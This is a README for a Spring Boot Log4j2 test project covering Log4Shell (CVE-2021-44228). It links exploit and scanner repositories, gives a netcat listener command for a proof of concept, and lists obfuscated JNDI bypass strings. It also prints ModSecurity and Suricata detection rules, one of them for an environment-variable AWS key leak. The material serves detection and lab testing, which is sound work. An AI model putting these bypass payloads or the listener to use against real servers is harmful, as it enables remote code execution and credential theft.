# springboot-logging-demo

**Repository Path**: redauzhang/springboot-logging-demo

## Basic Information

- **Project Name**: springboot-logging-demo
- **Description**: springboot-logging-demo, used for testing with log4j2.
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2021-12-11
- **Last Updated**: 2021-12-22

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# springboot demo build

## Installing the springboot-logging demo

### Using mvn

- [huawei-maven-settings.xml](https://mirrors.huaweicloud.com/api/v1/configurations/maven?)

> Replace the `settings.xml` under the `conf` directory of `apache-maven-3.8.1` with it.

- `mvn package install`, or click the hammer button in the top-right corner of `idea`

### Project references

- https://github.com/tangxiaofeng7/BurpLog4j2Scan
- https://github.com/2b45/CVE-2021-44228-Apache-Log4j-Rce
- https://github.com/kozmer/log4j-shell-poc

# Detection tools

- Static jar file scanning: https://github.com/logpresso/CVE-2021-44228-Scanner
- Web endpoint scanning: https://github.com/fullhunt/log4j-scan

# JNDI rogue server

- For a PoC, just use `nc -nvlp 10399`
- https://github.com/welk1n/JNDI-Injection-Exploit
- https://github.com/0x727/JNDIExploit

# Shared intelligence

- [log4shell IoCs](https://github.com/NCSC-NL/log4shell/tree/main/iocs)
- [ThreatBook apache_log4j2](https://x.threatbook.cn/v5/feature_vul/apache_log4j2)

# Protection methods

- Bypass words: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
- Key reference: [NCSC-NL/log4shell](https://github.com/NCSC-NL/log4shell)

## ModSecurity rules

- Reference: https://github.com/coreruleset/coreruleset/issues/2331
- https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/

```
# https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
#
# test.data: the obfuscated ${jndi:rmi:// forms the regex below is assembled from
# ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://
# ${${::-j}ndi:rmi://
# ${jndi:rmi://
# ${${lower:jndi}:${lower:rmi}://
# ${${lower:${lower:jndi}}:${lower:rmi}://
# ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://
# ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://
#
# ./regexp-assemble-v2.pl test.data
#
# yum -y install cpan; cpan install Regexp::Assemble

# Phase 2 rule: inspects cookies, argument names/values and XML bodies for the
# assembled ${jndi:rmi:// pattern and its lower/upper/::- obfuscated variants.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx .*\$\{(?:(\$\{\:\:\-j\}|j|J|\$\{lower\:j\}|\$\{upper\:j\})(\$\{\:\:\-n\}|n|N|\$\{lower\:n\}|\$\{upper\:n\})(\$\{\:\:\-d\}|d|D|\$\{lower\:d\}|\$\{upper\:d\})(\$\{\:\:\-i\}|i|I|\$\{lower\:i\}|\$\{upper\:i\}):(\$\{\:\:\-r\}|r|R|\$\{lower\:r\}|\$\{upper\:r\})(\$\{\:\:\-m\}|m|M|\$\{lower\:m\}|\$\{upper\:m\})(\$\{\:\:\-i\}|i|I|\$\{lower\:i\}|\$\{upper\:i\})|\$\{lower:(?:j(?:\}\$\{(?:upper:n\}\$\{lower:d\}\$\{upper:i\}:\$\{lower:r\}m\$\{lower:i\}|lower:n\}\$\{lower:d\}i:\$\{lower:rmi)|ndi\}:\$\{lower:rmi)|\$\{lower:jndi\}\}:\$\{lower:rmi)\}):\/\/.*" \
    "id:7170001,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'Apache Log4j Rce Exploit (CVE-2021-44228)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'attack-rce',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
```

## Suricata ruleset

```
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034667; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_11;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034668; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_11;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; distance:0; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034661; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; distance:0; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034662; rev:2; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034663; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034664; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034665; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034666; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Payload Domain"; dns.query; dotprefix; content:".bingsearchlib.com"; nocase; endswith; reference:url,twitter.com/sans_isc/status/1469305954835521539; reference:cve,2021-44228; classtype:domain-c2; sid:2034670; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, former_category ATTACK_RESPONSE, performance_impact Low, signature_severity Major, updated_at 2021_12_11;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228)"; content:"|24 7b|"; content:"|24 7b 3a 3a|"; distance:0; within:300; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034674; rev:1; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_12;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034676; rev:1; metadata:attack_target Server, created_at 2021_12_13, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_13;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|AWS_ACCESS_KEY_ID"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034699; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228)"; flow:established,to_server; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034659; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228)"; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034660; rev:3; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
#alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228)"; flow:established,to_server; content:"%7b"; nocase; fast_pattern; pcre:"/^(j|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)j(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-j(\x7d|%7d))(n|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)n(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-n(\x7d|%7d))/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)\x3a(d|n|m)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034671; rev:2; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
#alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228)"; content:"%7b"; nocase; fast_pattern; pcre:"/^(j|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)j(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-j(\x7d|%7d))(n|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)n(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-n(\x7d|%7d))/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034672; rev:2; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034700; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034701; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
#alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; fast_pattern; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d|\x24\x7b\x3a\x3a\-(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d|\x24\x7b\x3a\x3a\-(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d|\x24\x7b\x3a\x3a\-(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034702; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
#alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (CVE-2021-44228)"; content:"|24 7b|"; fast_pattern; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d|\x24\x7b\x3a\x3a\-(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d|\x24\x7b\x3a\x3a\-(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d|\x24\x7b\x3a\x3a\-(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034703; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034706; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228)"; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034707; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034708; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228)"; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034709; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034710; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034711; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
